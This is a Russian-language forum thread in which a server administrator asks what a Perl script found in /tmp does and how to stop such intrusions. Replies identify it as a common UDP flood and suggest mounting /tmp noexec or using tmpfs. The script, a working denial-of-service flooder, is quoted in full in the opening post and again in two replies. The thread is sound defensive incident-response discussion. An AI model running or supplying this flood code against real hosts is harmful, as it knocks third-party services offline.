У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
Спецы перла, скажите для чего он используется?
Какие есть методы защиты от проникновения такого в папку тпм?

был запущен от пользователя apache с параметрами 88.158.99.2 80 0

Вот содержимое:

code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
#!/usr/bin/perl
###################################################
################ UDP ATACK FLOOD ##################
###################################################

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf " \n";
printf "-------UDP ATACK FLOOD-------\n";
printf "EX: $0 <ip> <port> <time>\n";
printf "-----------------------------\n";
printf " \n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
    $iaddr = inet_aton("$ip");

printf " \n";
printf "-------UDP ATACK FLOOD-------\n";
printf "Seding flood: $ip:$port\n";
printf "-----------------------------\n";
printf " \n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
  --------------------------------------------------------------------------------

• Для чего этот скрипт может быть использован?,ncp, 15:07 , 24-Мрт-07
• Для чего этот скрипт может быть использован?,cubatura, 15:19 , 24-Мрт-07
  • Для чего этот скрипт может быть использован?,exn, 16:43 , 24-Мрт-07
• Для чего этот скрипт может быть использован?,nitalaut, 20:31 , 24-Мрт-07
  • Для чего этот скрипт может быть использован?,gektor, 22:10 , 24-Мрт-07
    • Для чего этот скрипт может быть использован?,nitalaut, 10:25 , 25-Мрт-07
      • Для чего этот скрипт может быть использован?,n, 14:48 , 25-Мрт-07
      • Для чего этот скрипт может быть использован?,gektor, 15:58 , 25-Мрт-07
        • Для чего этот скрипт может быть использован?,gektor, 15:59 , 25-Мрт-07
        • Для чего этот скрипт может быть использован?,nimb, 15:32 , 27-Мрт-07
          • Для чего этот скрипт может быть использован?,gektor, 15:15 , 28-Мрт-07

>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>
>
>Вот содержимое:
>
>code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
>#!/usr/bin/perl
>###################################################
>################ UDP ATACK FLOOD ##################
>###################################################
>
>use Socket;
>
>$ARGC=@ARGV;
>
>if ($ARGC !=3) {
> printf " \n";
> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";
> printf " \n";
> exit(1);
>}
>
>my ($ip,$port,$size,$time);
> $ip=$ARGV[0];
> $port=$ARGV[1];
> $time=$ARGV[2];
>
>socket(crazy, PF_INET, SOCK_DGRAM, 17);
>    $iaddr = inet_aton("$ip");
>
>printf " \n";
>printf "-------UDP ATACK FLOOD-------\n";
>printf "Seding flood: $ip:$port\n";
>printf "-----------------------------\n";
>printf " \n";
>
>if ($ARGV[1] ==0 && $ARGV[2] ==0) {
> goto randpackets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto packets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] ==0) {
> goto packets;
>}
>if ($ARGV[1] ==0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto randpackets;
>}
>
>packets:
>for (;;) {
> $size=$rand x $rand x $rand;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>}
>
>randpackets:
>for (;;) {
> $size=$rand x $rand x $rand;
> $port=int(rand 65000) +1;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>  --------------------------------------------------------------------------------

В програмировании ничего не понимаю, но скорее всего этот скрипт заставит товй сервер атаковать какой-ибо хост. Это судя по

> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";

>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>
>
>Вот содержимое:
>
>code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
>#!/usr/bin/perl
>###################################################
>################ UDP ATACK FLOOD ##################
>###################################################
>
>use Socket;
>
>$ARGC=@ARGV;
>
>if ($ARGC !=3) {
> printf " \n";
> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";
> printf " \n";
> exit(1);
>}
>
>my ($ip,$port,$size,$time);
> $ip=$ARGV[0];
> $port=$ARGV[1];
> $time=$ARGV[2];
>
>socket(crazy, PF_INET, SOCK_DGRAM, 17);
>    $iaddr = inet_aton("$ip");
>
>printf " \n";
>printf "-------UDP ATACK FLOOD-------\n";
>printf "Seding flood: $ip:$port\n";
>printf "-----------------------------\n";
>printf " \n";
>
>if ($ARGV[1] ==0 && $ARGV[2] ==0) {
> goto randpackets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto packets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] ==0) {
> goto packets;
>}
>if ($ARGV[1] ==0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto randpackets;
>}
>
>packets:
>for (;;) {
> $size=$rand x $rand x $rand;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>}
>
>randpackets:
>for (;;) {
> $size=$rand x $rand x $rand;
> $port=int(rand 65000) +1;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>  --------------------------------------------------------------------------------

бомбит пакетами размера $size,удаленный хост $ip

Скрипт ниинтересный, /ам

>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
Это довольно распространённый скрипт юдпфлуд - пытается завалить юдп пакетами удалённый хост - такой простенький DoS.
Теперь по устранению дырки:
1) Каталог /tmp доступен всем юзерам на чтение/запись и от этого никуда не денешься - специфика работы системы.
НО ты можешь(и должен) запретить ВЫПОЛНЕНИЕ программ в этом каталоге.
Для этого его надо смонтировать с определёнными опциями.
Подробнее в man mount.

2) Раз скрипт был запущен с правами апача значит и попал к тебе в систему он через дырку в апаче, а точнее вряд-ли в самом апаче, скорее всего дыра в каком-то сайте, который у тебя висит на апаче.
Очень вероятно, что это какой-то дырявый пхп скрипт.
Найти эту дыру будет не так легко.

>>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>>Спецы перла, скажите для чего он используется?
>>Какие есть методы защиты от проникновения такого в папку тпм?
>>
>>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>Это довольно распространённый скрипт юдпфлуд - пытается завалить юдп пакетами удалённый хост
>- такой простенький DoS.
>Теперь по устранению дырки:
>1) Каталог /tmp доступен всем юзерам на чтение/запись и от этого никуда
>не денешься - специфика работы системы.
>НО ты можешь(и должен) запретить ВЫПОЛНЕНИЕ программ в этом каталоге.
>Для этого его надо смонтировать с определёнными опциями.
>Подробнее в man mount.
>
>2) Раз скрипт был запущен с правами апача значит и попал к
>тебе в систему он через дырку в апаче, а точнее вряд-ли
>в самом апаче, скорее всего дыра в каком-то сайте, который у
>тебя висит на апаче.
>Очень вероятно, что это какой-то дырявый пхп скрипт.
>Найти эту дыру будет не так легко.

Спасибо. Хоть один ценный овтет кто-то дал.. спасибо!
А можешь еще плз сказать с какими именно опциями? ман слишком большой, а я даже не знаю что именно искать там в мане :(

>А можешь еще плз сказать с какими именно опциями? ман слишком большой,
>а я даже не знаю что именно искать там в мане
>:(
все зависит от типа файловой системы
для ext3 это что-то вроде этого

/dev/md6        /tmp            ext3    nodev,nosuid,noexec    0       2

man очень удобно структурирован - он разбит на группы, каждая группа описывает опции для какой-то одной ФС. Прокрути его до своей ФС и читай...

http://www.inf-sys.ru/ Официальный сайт компании Информ-Системы. Кому интересно оставляйте свои сообщения на форуме!

>>А можешь еще плз сказать с какими именно опциями? ман слишком большой,
>>а я даже не знаю что именно искать там в мане
>>:(
>все зависит от типа файловой системы
>для ext3 это что-то вроде этого
>
>/dev/md6        /tmp    
>        ext3  
> nodev,nosuid,noexec    0      
> 2
>
>man очень удобно структурирован - он разбит на группы, каждая группа описывает
>опции для какой-то одной ФС. Прокрути его до своей ФС и
>читай...

Оказалось что у меня при установке системы /tmp не отдельно был смонтирован, так что тут не прокатывает... :(

как мне прошить апач, который ставился с FC4 по умолчанию? yum update?

используйте tmpfs

>используйте tmpfs

Можешь поподробнее? что эт такое и с чем это едят?